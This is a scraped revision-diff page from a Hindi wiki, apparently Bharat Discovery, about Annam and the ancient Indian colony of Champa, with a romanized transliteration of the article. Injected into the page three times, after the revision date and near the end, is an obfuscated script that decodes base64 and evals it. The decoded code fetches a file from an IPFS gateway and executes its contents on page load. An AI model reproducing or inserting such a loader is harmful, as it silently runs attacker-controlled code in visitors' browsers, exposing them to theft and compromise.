Difference between revisions of "अनाम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
चंपा के व्यापारियों ने 'हिन्द-चीन' पहुँचकर 'वर्तमान अनाम' के प्रदेश में 'चंपा' नामक 'भारतीय उपनिवेश' स्थापित किया था।  
 
चंपा के व्यापारियों ने 'हिन्द-चीन' पहुँचकर 'वर्तमान अनाम' के प्रदेश में 'चंपा' नामक 'भारतीय उपनिवेश' स्थापित किया था।  
 
==चम्पा==
 
==चम्पा==
वर्तमान ‘अनाम’ का अधिकांश भाग इस क्षेत्र में समाहित था। इसका विस्तार 140 से 100 उत्तरी देशान्तर के बीच में था। 'हिन्दचीन' में [[भारत|भारतीयों]] का सर्वाधिक प्राचीन उपनिवेश 'चम्पा' था। ईसवी सन् से पूर्व ही भारतवासी इस देश में प्रविष्ट हो चुके थे। उस काल मे चम्पा राज्य सुख, वैभव और समृद्धि से भरपूर अनेक नगरों तथा अति सुन्दर [[हिन्दू]] व बौद्ध मन्दिरों से सुशोभित था। वहाँ के ‘मिसांग’ और ‘डांग डुआंग’ नाग के दो नगर आज भी दर्शनीय मन्दिरों के लिए प्रसिद्ध हैं। यहाँ के [[हिन्दू]] निवासी हिन्दू देवी-[[देवता|देवताओं]] की उपासना करते थे। चम्पा की वास्तुकला और तक्षण-कला सर्वश्रेष्ठ थी। इस राज्य में [[संस्कृत भाषा]] और [[हिन्दू धर्म]] तथा संस्कृति का व्यापक प्रसार था। [[मंगोल|मंगोलों]] और अनामियों के भीषण आक्रमणों ने सोलहवीं [[सदी]] में [[भारत]] के इस औपनिवेशिक राज्य का अन्त कर दिया। चम्पापुरी के वर्तमान [[अवशेष|अवशेषों]] में यहाँ के प्राचीन भारतीय [[धर्म]] व [[संस्कृति]] की सुन्दर झलक मिलती है।
+
वर्तमान ‘अनाम’ का अधिकांश भाग इस क्षेत्र में समाहित था। इसका विस्तार 140 से 100 उत्तरी देशान्तर के बीच में था। 'हिन्दचीन' में [[भारत|भारतीयों]] का सर्वाधिक प्राचीन उपनिवेश 'चम्पा' था। ईसवी सन् से पूर्व ही भारतवासी इस देश में प्रविष्ट हो चुके थे। उस काल मे चम्पा राज्य सुख, वैभव और समृद्धि से भरपूर अनेक नगरों तथा अति सुन्दर [[हिन्दू]] व बौद्ध मन्दिरों से सुशोभित था। वहाँ के ‘मिसांग’ और ‘डांग डुआंग’ नाग के दो नगर आज भी दर्शनीय मन्दिरों के लिए प्रसिद्ध हैं। यहाँ के [[हिन्दू]] निवासी हिन्दू देवी-[[देवता|देवताओं]] की उपासना करते थे। चम्पा की वास्तुकला और तक्षण-कला सर्वश्रेष्ठ थी। इस राज्य में [[संस्कृत भाषा]] और [[हिन्दू धर्म]] तथा संस्कृति का व्यापक प्रसार था। [[मंगोल|मंगोलों]] और अनामियों के भीषण आक्रमणों ने सोलहवीं [[सदी]] में [[भारत]] के इस औपनिवेशिक राज्य का अन्त कर दिया। [[चम्पापुरी]] के वर्तमान [[अवशेष|अवशेषों]] में यहाँ के प्राचीन भारतीय [[धर्म]] व [[संस्कृति]] की सुन्दर झलक मिलती है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 08:11, 4 September 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chanpa ke vyapariyoan ne 'hind-chin' pahuanchakar 'vartaman anam' ke pradesh mean 'chanpa' namak 'bharatiy upanivesh' sthapit kiya tha.

champa

vartaman ‘anam’ ka adhikaansh bhag is kshetr mean samahit tha. isaka vistar 140 se 100 uttari deshantar ke bich mean tha. 'hindachin' mean bharatiyoan ka sarvadhik prachin upanivesh 'champa' tha. eesavi sanh se poorv hi bharatavasi is desh mean pravisht ho chuke the. us kal me champa rajy sukh, vaibhav aur samriddhi se bharapoor anek nagaroan tatha ati sundar hindoo v bauddh mandiroan se sushobhit tha. vahaan ke ‘misaang’ aur ‘daang duaang’ nag ke do nagar aj bhi darshaniy mandiroan ke lie prasiddh haian. yahaan ke hindoo nivasi hindoo devi-devataoan ki upasana karate the. champa ki vastukala aur takshan-kala sarvashreshth thi. is rajy mean sanskrit bhasha aur hindoo dharm tatha sanskriti ka vyapak prasar tha. mangoloan aur anamiyoan ke bhishan akramanoan ne solahavian sadi mean bharat ke is aupaniveshik rajy ka ant kar diya. champapuri ke vartaman avasheshoan mean yahaan ke prachin bharatiy dharm v sanskriti ki sundar jhalak milati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh